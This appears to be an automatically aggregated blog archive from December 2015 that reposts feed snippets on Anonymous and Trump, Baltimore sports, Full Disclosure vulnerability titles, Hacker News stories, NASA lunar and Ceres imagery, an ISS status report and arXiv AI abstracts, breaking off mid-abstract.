Saturday, December 12, 2015

Anonymous says it took down Trump Tower website

A still image from a YouTube video from Anonymous threatening presidential candidate Donald Trump before the group claimed it took down the ...

from Google Alert - anonymous http://ift.tt/1NW6CoA
via IFTTT

My Lady Careys Dompe (Anonymous)

My Lady Careys Dompe (Anonymous). Add File. Add Sheet MusicAdd Your Own ... Composer, Anonymous. Piece Style, Renaissance. Instrumentation ...

from Google Alert - anonymous http://ift.tt/1QbN7iy
via IFTTT

48 comments

Mark Ratner: Anonymous just picked the wrong guy to mess with. ... President Trump will refuse anonymous people entry into the U.S.. In fact, he will ...

from Google Alert - anonymous http://ift.tt/1OYQ1pk
via IFTTT

Ravens: LT Eugene Monroe placed on IR, ending his season; started 6 games this season, signed 5-year deal in March 2014 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Ravens Report
Voted #1 Sports News App! Get It (http://t.co/QuvnqIDOBZ) and see why it's the easiest way to keep up with the Ravens. @Fanly
Baltimore, MD
http://t.co/QuvnqIDOBZ
Following: 3606 - Followers: 2928

December 12, 2015 at 10:50AM via Twitter http://twitter.com/ravens_fanly

[FD] Windows Authentication UI DLL side loading vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Event Viewer Snapin multiple DLL side loading vulnerabilities

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] COM+ Services DLL side loading vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Anonymous Declares War On Donald Trump — #OpTrump

After targeting the Islamic State (ISIS) group in the wake of deadly terror attacks in Paris, hacktivist group Anonymous has now turned its attention to controversial US presidential candidate Donald Trump. The hacktivist group has declared war against Donald Trump following his recent radical speech stating he wanted to ban Muslims from entering the United States. On


from The Hacker News http://ift.tt/1NhlWPA
via IFTTT

The Brightest Spot on Ceres


Dwarf planet Ceres is the largest object in the Solar System's main asteroid belt with a diameter of about 950 kilometers. Exploring Ceres from orbit since March, the Dawn spacecraft's camera has revealed about 130 or so mysterious bright spots, mostly associated with impact craters scattered around the small world's otherwise dark surface. The brightest one is near the center of the 90 kilometer wide Occator Crater, seen in this dramatic false color view combining near-infrared and visible light image data. A study now finds the bright spot's reflected light properties are probably most consistent with a type of magnesium sulfate called hexahydrite. Of course, magnesium sulfate is also known to Earth dwellers as epsom salt. Haze reported inside Occator also suggests the salty material could be left over as a mix of salt and water-ice sublimates on the surface. Since impacts would have exposed the material, Ceres' numerous and widely scattered bright spots may indicate the presence of a subsurface shell of ice-salt mix. In mid-December, Dawn will begin taking observations from its closest Ceres mapping orbit. via NASA http://ift.tt/1Y1YXjt

Space Weather to the Edge of the Solar System

Everyone likes to check the weather in a far away destination before they travel there. This is especially true for spaceflight, where the destination may be where no one has gone before. The mission of New Horizons to Pluto provided an opportunity to test our current space weather models, pushing them to the limit. This visualization presents the results from an Enlil model run, just one of the many space weather models being tested through the Community-Coordinated Modeling Center (CCMC) at NASA's Goddard Space Flight Center as part of the "New Horizons Flyby Modeling Challenge". This visualization presents a slice of the data through the ecliptic plane, the plane in which the planets of our solar system orbit. Because Pluto is a bit above this plane, the orbit is projected into the ecliptic plane of the data, as is the trajectory of the New Horizons probe. Three different variables are presented from the model - temperature, density, and pressure gradient, simultaneously, using the red, green and blue color channels of the color image. The density of the solar wind (green) flowing outward from the sun decreases as it spreads out. The temperature stays roughly constant as the solar wind material spreads through the solar system. We see the Parker spiral imprinted on the outflow from the spinning sun, much like the outflow from a spinning water sprinkler. We also see the strong density gradients (blue) created by coronal mass ejections and other shocks, propagating outward from the sun in the solar wind. We can observe regions of interesting interactions when the three primary colors of the basic variables combine to enhance the color, represented in the tricolor diagram below. White represents a hot, dense shock, while cyan (blue-green) represents a dense shock (usually visible close to the sun), magenta (purple) represents a hot, low-density shock, while yellow indicates hot and dense material, again usually close to the sun.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Moon Phase and Libration, 2016

The animation archived on this page shows the geocentric phase, libration, position angle of the axis, and apparent diameter of the Moon throughout the year 2016, at hourly intervals. Until the end of 2016, the initial Dial-A-Moon image will be the frame from this animation for the current hour.

Lunar Reconnaissance Orbiter (LRO) has been in orbit around the Moon since the summer of 2009. Its laser altimeter (LOLA) and camera (LROC) are recording the rugged, airless lunar terrain in exceptional detail, making it possible to visualize the Moon with unprecedented fidelity. This is especially evident in the long shadows cast near the terminator, or day-night line. The pummeled, craggy landscape thrown into high relief at the terminator would be impossible to recreate in the computer without global terrain maps like those from LRO.

The Moon always keeps the same face to us, but not exactly the same face. Because of the tilt and shape of its orbit, we see the Moon from slightly different angles over the course of a month. When a month is compressed into 24 seconds, as it is in this animation, our changing view of the Moon makes it look like it's wobbling. This wobble is called libration.

The word comes from the Latin for "balance scale" (as does the name of the zodiac constellation Libra) and refers to the way such a scale tips up and down on alternating sides. The sub-Earth point gives the amount of libration in longitude and latitude. The sub-Earth point is also the apparent center of the Moon's disk and the location on the Moon where the Earth is directly overhead.

The Moon is subject to other motions as well. It appears to roll back and forth around the sub-Earth point. The roll angle is given by the position angle of the axis, which is the angle of the Moon's north pole relative to celestial north. The Moon also approaches and recedes from us, appearing to grow and shrink. The two extremes, called perigee (near) and apogee (far), differ by about 14%.

The most noticed monthly variation in the Moon's appearance is the cycle of phases, caused by the changing angle of the Sun as the Moon orbits the Earth. The cycle begins with the waxing (growing) crescent Moon visible in the west just after sunset. By first quarter, the Moon is high in the sky at sunset and sets around midnight. The full Moon rises at sunset and is high in the sky at midnight. The third quarter Moon is often surprisingly conspicuous in the daylit western sky long after sunrise.

Celestial north is up in these images, corresponding to the view from the northern hemisphere. The descriptions of the print resolution stills also assume a northern hemisphere orientation. (There is also a south-up version of this page.)

The Moon's Orbit

From this bird's-eye view, it's somewhat easier to see that the phases of the Moon are an effect of the changing angles of the sun, Moon and Earth. The Moon is full when its orbit places it in the middle of the night side of the Earth. First and Third Quarter Moon occur when the Moon is along the day-night line on the Earth.

The First Point of Aries is at the 3 o'clock position in the image. The sun is in this direction at the March equinox. You can check this by freezing the animation at the 1:04 mark, or by freezing the full animation with the time stamp near March 20 at 4:00 UTC. This direction serves as the zero point for both ecliptic longitude and right ascension.

The north pole of the Earth is tilted 23.5 degrees toward the 12 o'clock position at the top of the image. The tilt of the Earth is important for understanding why the north pole of the Moon seems to swing back and forth. In the full animation, watch both the orbit and the "gyroscope" Moon in the lower left. The widest swings happen when the Moon is at the 3 o'clock and 9 o'clock positions. When the Moon is at the 3 o'clock position, the ground we're standing on is tilted to the left when we look at the Moon. At the 9 o'clock position, it's tilted to the right. The tilt itself doesn't change. We're just turned around, looking in the opposite direction.

The subsolar and sub-Earth points are the locations on the Moon's surface where the sun or the Earth are directly overhead, at the zenith. A line pointing straight up at one of these points will be pointing toward the sun or the Earth. The sub-Earth point is also the apparent center of the Moon's disk as observed from the Earth.

In the animation, the blue dot is the sub-Earth point, and the yellow dot is the subsolar point. The lunar latitude and longitude of the sub-Earth point is a measure of the Moon's libration. For example, when the blue dot moves to the left of the meridian (the line at 0 degrees longitude), an extra bit of the Moon's western limb is rotating into view, and when it moves above the equator, a bit of the far side beyond the north pole becomes visible.

At any given time, half of the Moon is in sunlight, and the subsolar point is in the center of the lit half. Full Moon occurs when the subsolar point is near the center of the Moon's disk. When the subsolar point is somewhere on the far side of the Moon, observers on Earth see a crescent phase.

The Moon's orbit around the Earth isn't a perfect circle. The orbit is slightly elliptical, and because of that, the Moon's distance from the Earth varies between 28 and 32 Earth diameters, or about 356,400 and 406,700 kilometers. In each orbit, the smallest distance is called perigee, from Greek words meaning "near earth," while the greatest distance is called apogee. The Moon looks largest at perigee because that's when it's closest to us.

The animation follows the imaginary line connecting the Earth and the Moon as it sweeps around the Moon's orbit. From this vantage point, it's easy to see the variation in the Moon's distance. Both the distance and the sizes of the Earth and Moon are to scale in this view. In the HD-resolution frames, the Earth is 50 pixels wide, the Moon is 14 pixels wide, and the distance between them is about 1500 pixels, on average.

Note too that the Earth appears to go through phases just like the Moon does. For someone standing on the surface of the Moon, the sun and the stars rise and set, but the Earth doesn't move in the sky. It goes through a monthly sequence of phases as the sun angle changes. The phases are the opposite of the Moon's. During New Moon here, the Earth is full as viewed from the Moon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1QitViS
via IFTTT

Moon Phase and Libration, 2016 South Up

The animation archived on this page shows the geocentric phase, libration, position angle of the axis, and apparent diameter of the Moon throughout the year 2016, at hourly intervals. Until the end of 2016, the initial Dial-A-Moon image will be the frame from this animation for the current hour.

Lunar Reconnaissance Orbiter (LRO) has been in orbit around the Moon since the summer of 2009. Its laser altimeter (LOLA) and camera (LROC) are recording the rugged, airless lunar terrain in exceptional detail, making it possible to visualize the Moon with unprecedented fidelity. This is especially evident in the long shadows cast near the terminator, or day-night line. The pummeled, craggy landscape thrown into high relief at the terminator would be impossible to recreate in the computer without global terrain maps like those from LRO.

The Moon always keeps the same face to us, but not exactly the same face. Because of the tilt and shape of its orbit, we see the Moon from slightly different angles over the course of a month. When a month is compressed into 24 seconds, as it is in this animation, our changing view of the Moon makes it look like it's wobbling. This wobble is called libration.

The word comes from the Latin for "balance scale" (as does the name of the zodiac constellation Libra) and refers to the way such a scale tips up and down on alternating sides. The sub-Earth point gives the amount of libration in longitude and latitude. The sub-Earth point is also the apparent center of the Moon's disk and the location on the Moon where the Earth is directly overhead.

The Moon is subject to other motions as well. It appears to roll back and forth around the sub-Earth point. The roll angle is given by the position angle of the axis, which is the angle of the Moon's north pole relative to celestial north. The Moon also approaches and recedes from us, appearing to grow and shrink. The two extremes, called perigee (near) and apogee (far), differ by more than 10%.

The most noticed monthly variation in the Moon's appearance is the cycle of phases, caused by the changing angle of the Sun as the Moon orbits the Earth. The cycle begins with the waxing (growing) crescent Moon visible in the west just after sunset. By first quarter, the Moon is high in the sky at sunset and sets around midnight. The full Moon rises at sunset and is high in the sky at midnight. The third quarter Moon is often surprisingly conspicuous in the daylit western sky long after sunrise.

Celestial south is up in these images, corresponding to the view from the southern hemisphere. The descriptions of the print resolution stills also assume a southern hemisphere orientation. (There is also a north-up version of this page.)

The Moon's Orbit

From this bird's-eye view, it's somewhat easier to see that the phases of the Moon are an effect of the changing angles of the sun, Moon and Earth. The Moon is full when its orbit places it in the middle of the night side of the Earth. First and Third Quarter Moon occur when the Moon is along the day-night line on the Earth.

The First Point of Aries is at the 3 o'clock position in the image. The sun is in this direction at the March equinox. You can check this by freezing the animation at the 1:04 mark, or by freezing the full animation with the time stamp near March 20 at 4:00 UTC. This direction serves as the zero point for both ecliptic longitude and right ascension.

The south pole of the Earth is tilted 23.5 degrees toward the 12 o'clock position at the top of the image. The tilt of the Earth is important for understanding why the north pole of the Moon seems to swing back and forth. In the full animation, watch both the orbit and the "gyroscope" Moon in the lower left. The widest swings happen when the Moon is at the 3 o'clock and 9 o'clock positions. When the Moon is at the 3 o'clock position, the ground we're standing on is tilted to the left when we look at the Moon. At the 9 o'clock position, it's tilted to the right. The tilt itself doesn't change. We're just turned around, looking in the opposite direction.

The subsolar and sub-Earth points are the locations on the Moon's surface where the sun or the Earth are directly overhead, at the zenith. A line pointing straight up at one of these points will be pointing toward the sun or the Earth. The sub-Earth point is also the apparent center of the Moon's disk as observed from the Earth.

In the animation, the blue dot is the sub-Earth point, and the yellow dot is the subsolar point. The lunar latitude and longitude of the sub-Earth point is a measure of the Moon's libration. For example, when the blue dot moves to the left of the meridian (the line at 0 degrees longitude), an extra bit of the Moon's eastern limb is rotating into view, and when it moves above the equator, a bit of the far side beyond the south pole becomes visible.

At any given time, half of the Moon is in sunlight, and the subsolar point is in the center of the lit half. Full Moon occurs when the subsolar point is near the center of the Moon's disk. When the subsolar point is somewhere on the far side of the Moon, observers on Earth see a crescent phase.

The Moon's orbit around the Earth isn't a perfect circle. The orbit is slightly elliptical, and because of that, the Moon's distance from the Earth varies between 28 and 32 Earth diameters, or about 356,400 and 406,700 kilometers. In each orbit, the smallest distance is called perigee, from Greek words meaning "near earth," while the greatest distance is called apogee. The Moon looks largest at perigee because that's when it's closest to us.

The animation follows the imaginary line connecting the Earth and the Moon as it sweeps around the Moon's orbit. From this vantage point, it's easy to see the variation in the Moon's distance. Both the distance and the sizes of the Earth and Moon are to scale in this view. In the HD-resolution frames, the Earth is 50 pixels wide, the Moon is 14 pixels wide, and the distance between them is about 1500 pixels, on average.

Note too that the Earth appears to go through phases just like the Moon does. For someone standing on the surface of the Moon, the sun and the stars rise and set, but the Earth doesn't move in the sky. It goes through a monthly sequence of phases as the sun angle changes. The phases are the opposite of the Moon's. During New Moon here, the Earth is full as viewed from the Moon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1jUk849
via IFTTT

Friday, December 11, 2015

Sex and Love Addicts Anonymous

Sex and Love Addicts Anonymous is a Twelve step, Twelve Traditional oriented fellowship based on the model pioneered by Alcoholics Anonymous.

from Google Alert - anonymous http://ift.tt/1OY0srq
via IFTTT

[FD] APPLE-SA-2015-12-11-1 iTunes 12.3.2

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Polycom VVX-Series Business Media Phones Path Traversal Vulnerability

Polycom VVX-Series Business Media Phones Path Traversal Vulnerability --Summar

Source: Gmail -> IFTTT-> Blogger

Trump Tower website taken down by…

Photo by Spencer Platt/Getty Images People walk by the Trump Tower in Midtown Manhattan on December 8, 2015 in New York City. The website for ...

from Google Alert - anonymous http://ift.tt/1RJ0SEK
via IFTTT

Ravens: QB Matt Schaub (chest) misses third day of practice; Jimmy Clausen expected to start Sunday vs. Seahawks (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Webform title displays for Anonymous, but not webform's fields

I am trying to understand why I can't get a webform's fields to display to Anonymous, when the form's title does display and the form page, as a main ...

from Google Alert - anonymous http://ift.tt/1Qjiszz
via IFTTT

Orioles: Resolving Chris Davis situation still at top of GM Dan Duquette's "hefty to-do list" for the offseason - Matz (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Recent Comments Widgets shows names as "Anonymous"

Recent Comments Widgets shows names as "Anonymous" (1 post). brt. Member Posted 36 minutes ago #. first of all: thank you very much for this great ...

from Google Alert - anonymous http://ift.tt/1UdyNEK
via IFTTT

ISS Daily Summary Report – 12/10/15

The ISS crew is sleep shifting today in support of Soyuz 43 (43S) undock and landing tomorrow. Crew sleep will begin at 9:00am CST this morning. 43S undocking is scheduled to occur early Friday morning at 3:49am CST.

Orbital ATK (OA)-4 Status: The crew started their day by outfitting the Node 1 to Cygnus vestibule, removing Controller Panel Assemblies (CPAs), and opening the Node1 and Cygnus hatches. Once the hatches were open, they obtained an air sample and installed Inter-module Ventilation (IMV) ducting. They also photo documented overall cargo configuration. No issues were observed with the cargo. Cygnus cargo operations are scheduled to start next week.

Crew Departure Preparation: Yui and Lindgren continued packing their personal items in preparation for crew return to Earth on 43S tomorrow. The personal items will return by way of 43S, SpX-8, and SpX-9 vehicles.

Twins Study: In support of the Twins Study, Kelly continued his week-long Flight Day 240 daily saliva collection and also made a urine collection. This investigation is an integrated compilation of ten different studies led by multiple investigators. The studies take advantage of a unique opportunity to look at the effects of space travel on identical twins, with one of them experiencing space travel for a year while the other remains earth-bound for that same year. The study looks at changes in the human body that are important in the fields of genetics, psychology, physiology, microbiology, and immunology.

Sprint Ultrasound: Kelly performed his Return minus 7 day (R-7) thigh and calf ultrasound scans today with assistance from Lindgren and guidance from the Sprint ground team. Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of the long term goal of protecting human fitness for even longer space exploration missions.

Dose Distribution Inside the ISS – 3D (DOSIS 3D): Kelly deinstalled the European Space Agency’s (ESA’s) DOSIS 3D passive detectors from the Columbus module for return on the 43S vehicle. Data from the various active and passive radiation detectors installed in the ISS are used in the determination of the radiation field parameters absorbed dose and dose equivalent inside the ISS. A concise three dimensional (3D) dose distribution map of all the segments of the ISS will be developed, based on this data and data from JAXA and NASA monitoring devices.

Microbiome Water Sample Handover: Lindgren handed the Microbiome water sample collected on Tuesday to Kononenko for return on the 43S vehicle.

Veg-01: Kelly refilled the Veg-01 plant pillows with water. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility. For this run, Zinnias will be grown for 60 days and are expected to produce flowers.

Ras Labs-CASIS-ISS Project for Synthetic Muscle: Resistance to Radiation (Synthetic Muscle): Lindgren took a set of historical photos of the synthetic muscle samples. The purpose of this investigation is to measure the effects of radiation on proprietary synthetic muscle materials in space and earth environments. Robots made of these materials could provide assistance to humans in space, enhance survivability of robots during deep space travel, and provide support in extreme radiation environments on Earth.

Sleep Log: Kornienko recorded a Sleep Log entry today after waking. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness. The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.

Space Headaches: Yui and Lindgren completed their weekly Space Headaches questionnaires today. Headaches can be a common complaint during spaceflight. The Space Headaches experiment will provide information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space.

Today’s Planned Activities

All activities were completed unless otherwise noted.

Morning Inspection. SM ПСС (Caution & Warning Panel) Test / Manual Controls [РСУ] SLEEP – Questionnaire Morning Inspection, Laptop RS1(2) Reboot RSS 1, 2 Reboot TWIN – Saliva Sample Collection NEIROIMMUNITET. Saliva Test HRF – Sample MELFI Insertion TWIN – Urine Sample Collection HRF – Sample MELFI Insertion Soyuz 717 Samsung Tablet Recharge – initiate High Definition (HD) Camcorder Setup to capture Cygnus Hatch Opening Removal of Node 1 Nadir CBM Controller Panel Assembly (CPA) ISS crew and ГОГУ (RSA Flight Control Management Team) weekly conference PILOT-T. Preparation for the experiment On MCC GO De-installation of ТА251М1Б from Soyuz 717 Orbital Compartment WRS – Recycle Tank Fill USND2 – Hardware Activation Crew Departure Prep PILOT-T. Experiment Ops SPRINT – Hardware prep and installation Cygnus – Configuration for Vestibule Ingress SPRINT – Operator Assistance with the Experiment NEIROIMMUNITET. Closeout Ops Handover of USOS water samples to RS to be packed into P/L container for return on Soyuz 717 Soyuz 717 Return Stowage Ops (Payload Container) Progress 428 (DC1) Stowage Ops with IMS Support Acoustic Dosimeter Stow DOSIS 3D – Removal of Passive Dosimeters in Columbus Handover of DOS3D dosimeters to RS to be packed into P/L container for return on Soyuz 717 TWIN – Saliva Collection Kit Cygnus Ingress Cygnus (OA-4) Air Sampling using АК-1М sampler prior to Air Duct Installation Checking Charger Connection to ПН28-120 Invertor Cygnus – Cargo Photography Soyuz 718 Samsung Tablet Recharge – Initiate Video Footage of Greetings USND2 – Hardware Deactivation PILOT-T. Closeout Ops Audio-Answers to the Questions from Nauka I Zhizn magazine Crew Departure […]

from ISS On-Orbit Status Report http://ift.tt/1UcNojS
via IFTTT

Hacker-Friendly Search Engine that Lists Every Internet-Connected Device

Meet an all-new Hacker’s Search Engine similar to Shodan – Censys. At the end of last month, security researchers from SEC Consult found that the lazy manufacturers of home routers and Internet of Things (IoT) devices have been re-using the same set of hard-coded cryptographic keys, leaving around 3 million IoT devices open to mass hijacking. But how did the researchers get this


from The Hacker News http://ift.tt/1NRQ1Cf
via IFTTT

Government Could Hack Children's Toys to Spy on You

Smartphones, Smart TVs, Smart Watches, Cell Phone Towers, Messaging services… but now, What's Next? Smart Toys? Yes, probably. A tech expert is warning that 'Smart Toys' could now be used by government intelligence agencies to spy on suspects. As part of the Investigatory Powers Bill, children's connected toys could be the next item to be used by the government in an effort to spy


from The Hacker News http://ift.tt/1QA2AY3
via IFTTT

France will not Ban Public Wi-Fi Or Tor Network, Prime Minister Valls Confirms

Despite the French Ministry of Interior's demands, France will not ban the TOR anonymity network or Free public Wi-Fi as a way to help law enforcement fight terrorism. French Prime Minister Manuel Valls has gone on record saying that a ban on Free public Wi-Fi is "not a course of action envisaged," and he is not in favor of banning the TOR anonymity network, either. Following the


from The Hacker News http://ift.tt/1QzSEOg
via IFTTT

Daytime Moon Meets Morning Star


Venus now appears as Earth's brilliant morning star, standing in a line-up of planets above the southeastern horizon before dawn. For most, the silvery celestial beacon rose predawn in a close pairing with an old crescent Moon on Monday, December 7. But also widely seen from locations in North and Central America, the lunar crescent actually occulted or passed in front of Venus during Monday's daylight hours. This time series follows the daytime approach of Moon and morning star in clear blue skies from Phoenix, Arizona. The progression of nine sharp telescopic snapshots, made between 9:30am and 9:35am local time, runs from lower left to upper right, when Venus winked out behind the bright lunar limb. via NASA http://ift.tt/1jQd6NP

Thursday, December 10, 2015

Convolutional Monte Carlo Rollouts in Go. (arXiv:1512.03375v1 [cs.LG])

In this work, we present a MCTS-based Go-playing program which uses convolutional networks in all parts. Our method performs MCTS in batches, explores the Monte Carlo search tree using Thompson sampling and a convolutional network, and evaluates convnet-based rollouts on the GPU. We achieve strong win rates against open source Go programs and attain competitive results against state of the art convolutional net-based Go-playing programs.

from cs.AI updates on arXiv.org http://ift.tt/1RHylzi
via IFTTT

Exploration and Exploitation of Victorian Science in Darwin's Reading Notebooks. (arXiv:1509.07175v2 [cs.CL] UPDATED)

Search in an environment with an uncertain distribution of resources involves a trade-off between local exploitation and distant exploration. This extends to the problem of information foraging, where a knowledge-seeker shifts between reading in depth and studying new domains. To study this, we examine the reading choices made by one of the most celebrated scientists of the modern era: Charles Darwin. Darwin built his theory of natural selection in part by synthesizing disparate parts of Victorian science. When we analyze his extensively self-documented reading, we find he does not follow a pattern of surprise-minimization. Rather, he shifts between phases in which he either remains with familiar topics or seeks cognitive surprise in novel fields. On the longest timescales, these shifts correlate with major intellectual epochs of his career, as detected by Bayesian epoch estimation. When we compare Darwin's reading path with publication order of the same texts, we find Darwin more adventurous than the culture as a whole. These results provide novel quantitative evidence for historical hypotheses previously debated only qualitatively.

from cs.AI updates on arXiv.org http://ift.tt/1FxghEk
via IFTTT

Learning Linguistic Biomarkers for Predicting Mild Cognitive Impairment using Compound Skip-grams. (arXiv:1511.02436v2 [cs.CL] UPDATED)

Predicting Mild Cognitive Impairment (MCI) is currently a challenge as existing diagnostic criteria rely on neuropsychological examinations. Automated Machine Learning (ML) models that are trained on verbal utterances of MCI patients can aid diagnosis. Using a combination of skip-gram features, our model learned several linguistic biomarkers to distinguish between 19 patients with MCI and 19 healthy control individuals from the DementiaBank language transcript clinical dataset. Results show that a model with compound of skip-grams has better AUC and could help ML prediction on small MCI data sample.

from cs.AI updates on arXiv.org http://ift.tt/1Hsj82r
via IFTTT

Deep Reinforcement Learning in Parameterized Action Space. (arXiv:1511.04143v2 [cs.AI] UPDATED)

Recent work has shown that deep neural networks are capable of approximating both value functions and policies in reinforcement learning domains featuring continuous state and action spaces. However, to the best of our knowledge no previous work has succeeded at using deep neural networks in structured (parameterized) continuous action spaces. To fill this gap, this paper focuses on learning within the domain of simulated RoboCup soccer, which features a small set of discrete action types, each of which is parameterized with continuous variables. The best learned agent can score goals more reliably than the 2012 RoboCup champion agent. As such, this paper represents a successful extension of deep reinforcement learning to the class of parameterized action space MDPs.

from cs.AI updates on arXiv.org http://ift.tt/1PJCj9f
via IFTTT

Anonymous woman pays off strangers' $20K Toys R Us layaways

A Massachusetts woman who paid off strangers' layaways last year has done the same this holiday season.

from Google Alert - anonymous http://ift.tt/1jRLwzY
via IFTTT

[FD] BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability

Blue Frost Security GmbH http://ift.tt/1IH5eGS research(at)bluefrostsecurity.de BFS-SA-2015-003 10-December-2015

Source: Gmail -> IFTTT-> Blogger

Orioles Buzz: Baltimore reportedly inquired about Rockies OF Carlos Gonzalez; don't want to part with SP Kevin Gausman (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


B.J. Rains
Boise State football and basketball beat writer, Idaho Press-Tribune. AP Top 25 hoops voter. Contributor to ESPN Boise, KBOI TV. Email: bjrains@idahopress.com.
Boise, Idaho
http://t.co/unLpQMH0hj
Following: 3006 - Followers: 11092

December 10, 2015 at 03:00PM via Twitter http://twitter.com/BJRains

[vue-router] Components show as <Anonymous Component>.

Using vue@1.0.10 and vue-router@0.7.7 . When I go to /bar , the Bar component is named <Anonymous Component> in Vue Devtools. Is that how it's ...

from Google Alert - anonymous http://ift.tt/1NY69Zf
via IFTTT

The case for anonymous case studies

The case for anonymous case studies. When beginning your application security journey, one of the most valuable actions you can take is to learn ...

from Google Alert - anonymous http://ift.tt/1NPWv4I
via IFTTT

'Create a new account for an anonymous order' rule don't work

But if the user is anonymous, and when he completes order his account is not created. 'Create a new account for an anonymous order' is enabled and ...

from Google Alert - anonymous http://ift.tt/1lxYsws
via IFTTT

SportsCenter Video: Orioles "don't want to wait" for Chris Davis, pulled offer - Buster Olney; willing to re-open talks (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Wednesday, December 9, 2015

I have a new follower on Twitter


Cordny Nederkoorn
Building a community about bird behaviour worldwide

https://t.co/BRsMfyyZpf
Following: 14964 - Followers: 16264

December 09, 2015 at 10:21PM via Twitter http://twitter.com/BirdsBehaviour

A Novel Regularized Principal Graph Learning Framework on Explicit Graph Representation. (arXiv:1512.02752v1 [cs.AI])

Many scientific datasets are of high dimension, and the analysis usually requires visual manipulation by retaining the most important structures of data. Principal curve is a widely used approach for this purpose. However, many existing methods work only for data with structures that are not self-intersected, which is quite restrictive for real applications. A few methods can overcome the above problem, but they either require complicated human-made rules for a specific task with lack of convergence guarantee and adaption flexibility to different tasks, or cannot obtain explicit structures of data. To address these issues, we develop a new regularized principal graph learning framework that captures the local information of the underlying graph structure based on reversed graph embedding. As showcases, models that can learn a spanning tree or a weighted undirected $\ell_1$ graph are proposed, and a new learning algorithm is developed that learns a set of principal points and a graph structure from data, simultaneously. The new algorithm is simple with guaranteed convergence. We then extend the proposed framework to deal with large-scale data. Experimental results on various synthetic and six real world datasets show that the proposed method compares favorably with baselines and can uncover the underlying structure correctly.

from cs.AI updates on arXiv.org http://ift.tt/1jP1URQ
via IFTTT

ShapeNet: An Information-Rich 3D Model Repository. (arXiv:1512.03012v1 [cs.GR])

We present ShapeNet: a richly-annotated, large-scale repository of shapes represented by 3D CAD models of objects. ShapeNet contains 3D models from a multitude of semantic categories and organizes them under the WordNet taxonomy. It is a collection of datasets providing many semantic annotations for each 3D model such as consistent rigid alignments, parts and bilateral symmetry planes, physical sizes, keywords, as well as other planned annotations. Annotations are made available through a public web-based interface to enable data visualization of object attributes, promote data-driven geometric analysis, and provide a large-scale quantitative benchmark for research in computer graphics and vision. At the time of this technical report, ShapeNet has indexed more than 3,000,000 models, 220,000 models out of which are classified into 3,135 categories (WordNet synsets). In this report we describe the ShapeNet effort as a whole, provide details for all currently available datasets, and summarize future plans.

from cs.AI updates on arXiv.org http://ift.tt/1QglapI
via IFTTT

Learning measures of semi-additive behaviour. (arXiv:1512.03020v1 [cs.AI])

In business analytics, measure values, such as sales numbers or volumes of cargo transported, are often summed along values of one or more corresponding categories, such as time or shipping container. However, not every measure should be added by default (e.g., one might more typically want a mean over the heights of a set of people); similarly, some measures should only be summed within certain constraints (e.g., population measures need not be summed over years). In systems such as Watson Analytics, the exact additive behaviour of a measure is often determined by a human expert. In this work, we propose a small set of features for this issue. We use these features in a case-based reasoning approach, where the system suggests an aggregation behaviour, with 86% accuracy in our collected dataset.

from cs.AI updates on arXiv.org http://ift.tt/1jP1URK
via IFTTT

Exploiting Causality for Selective Belief Filtering in Dynamic Bayesian Networks. (arXiv:1401.7941v2 [cs.AI] UPDATED)

Dynamic Bayesian networks (DBNs) are a general model for stochastic processes with partially observed states. Belief filtering in DBNs is the task of inferring the belief state (i.e. the probability distribution over process states) based on incomplete and noisy observations. This can be a hard problem in complex processes with large state space. In this article, we explore the idea of accelerating the filtering task by automatically exploiting causality in the process. We consider a specific type of causal relation, called passivity, which pertains to how state variables cause changes in other variables. We present a novel filtering method, called Passivity-based Monitoring (PM), which maintains a factored belief representation and exploits passivity to perform selective updates over the belief factors. PM produces exact belief states under certain assumptions and approximate belief states otherwise, where the approximation error is bounded by the degree of uncertainty in the process. We show empirically, in synthetic processes with varying sizes and degrees of passivity, that PM is faster than several alternative methods while achieving competitive accuracy. Furthermore, we demonstrate how passivity occurs naturally in a complex system such as a multi-robot warehouse, and how PM can exploit this to accelerate the filtering task.

from cs.AI updates on arXiv.org http://ift.tt/1aLCiAv
via IFTTT

Hinge-Loss Markov Random Fields and Probabilistic Soft Logic. (arXiv:1505.04406v2 [cs.LG] UPDATED)

A fundamental challenge in developing high-impact machine learning technologies is balancing the ability to model rich, structured domains with the ability to scale to big data. Many important problem areas are both richly structured and large scale, from social and biological networks, to knowledge graphs and the Web, to images, video, and natural language. In this paper, we introduce two new formalisms for modeling structured data, distinguished from previous approaches by their ability to both capture rich structure and scale to big data. The first, hinge-loss Markov random fields (HL-MRFs), is a new kind of probabilistic graphical model that generalizes different approaches to convex inference. We unite three approaches from the randomized algorithms, probabilistic graphical models, and fuzzy logic communities, showing that all three lead to the same inference objective. We then derive HL-MRFs by generalizing this unified objective. The second new formalism, probabilistic soft logic (PSL), is a probabilistic programming language that makes HL-MRFs easy to define using a syntax based on first-order logic. We next introduce an algorithm for inferring most-probable variable assignments (MAP inference) that is much more scalable than general-purpose convex optimization software, because it uses message passing to take advantage of sparse dependency structures. We then show how to learn the parameters of HL-MRFs. The learned HL-MRFs are as accurate as analogous discrete models, but much more scalable. Together, these 